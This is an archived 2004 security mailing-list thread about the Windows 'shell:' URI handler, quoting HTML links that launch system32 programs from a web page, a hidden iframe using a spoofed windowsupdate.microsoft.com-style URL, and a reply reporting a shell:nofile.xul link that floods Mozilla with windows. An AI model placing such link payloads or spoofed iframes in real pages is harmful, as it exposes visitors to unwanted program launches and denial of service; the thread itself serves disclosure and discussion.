[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <40EC8589.5000200@interfree.it>
From: giocasati at interfree.it (Komrade)
Subject: shell:windows command question
>> On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
>>
>>
>>
>>> -----snip------
>>> center><br><br><img src="nocigar.gif"></center>
>>> <center>
>>> <a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe
>>> src="http://windowsupdate.microsoft.com%2F.http-
>>> equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
>>> [customise as you see fit]
>>> <http://www.malware.com/stockpump.html>
>>> ------end----------
>>> The code above has interest to me.
>>> Even in Mozilla the commands below will work.
>>> <a href=shell:windows\\system32\\calc.exe>1</a>
>>> <a href=shell:windows\system32\calc.exe>2</a>
>>> <a href=shell:windows\system32\winver.exe>4</a>
>>> Just save them to an .html file and run it.
>>> The first one with the double quotes was from bugtraq:
>>> Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash
>>> <http://seclists.org/lists/bugtraq/2004/Mar/0188.html>
>>> The links below that will run calc as well as winver.
>>> It seems it calls windows as a virtual dir because c:\winxp is what I
>>> have.
>>> I have been playing around to see if cmd.exe will work with it but
>>> without
>>> luck.
>>> This is what is in the registry.
>>> HKEY_CLASSES_ROOT\Shell
>>> Look in the registry key above. You will find the shell object calls
>>> Windows
>>> Explorer with a particular set of arguments.
>>> %SystemRoot%\Explorer.exe /e,/idlist,%I,%L
>>> So this is tied to explorer.exe. This is something involved with the
>>> underlying functions of windows
>>> and not IE so to speak because it works in Mozilla or from the run line.
>>> I'm trying to find out more about the shell: command because I can put a
>>> link on a site that seems to run anything
>>> in system32 dir. I'd like to see if you can pass parameters to it.
>>>
>>> Anyone give me more info on the shell:windows command?
>>> JP
>>>
I found an odd behaviour in my mozilla browser, when i try to execute
this link:
<a href=shell:nofile.xul>click here</a>
(.xul file is a Mozilla XUL Document)
When i click on the link, i see many mozilla windows opening and
consuming 100% of the CPU. The system became unstable, forcing me to
disconnect from my login.
I have Mozilla 1.7b and Windows XP sp0.
This is not a real security matter, but it's quite annoying.
- Komrade -
- http://unsecure.altervista.org -
Powered by blists - more mailing lists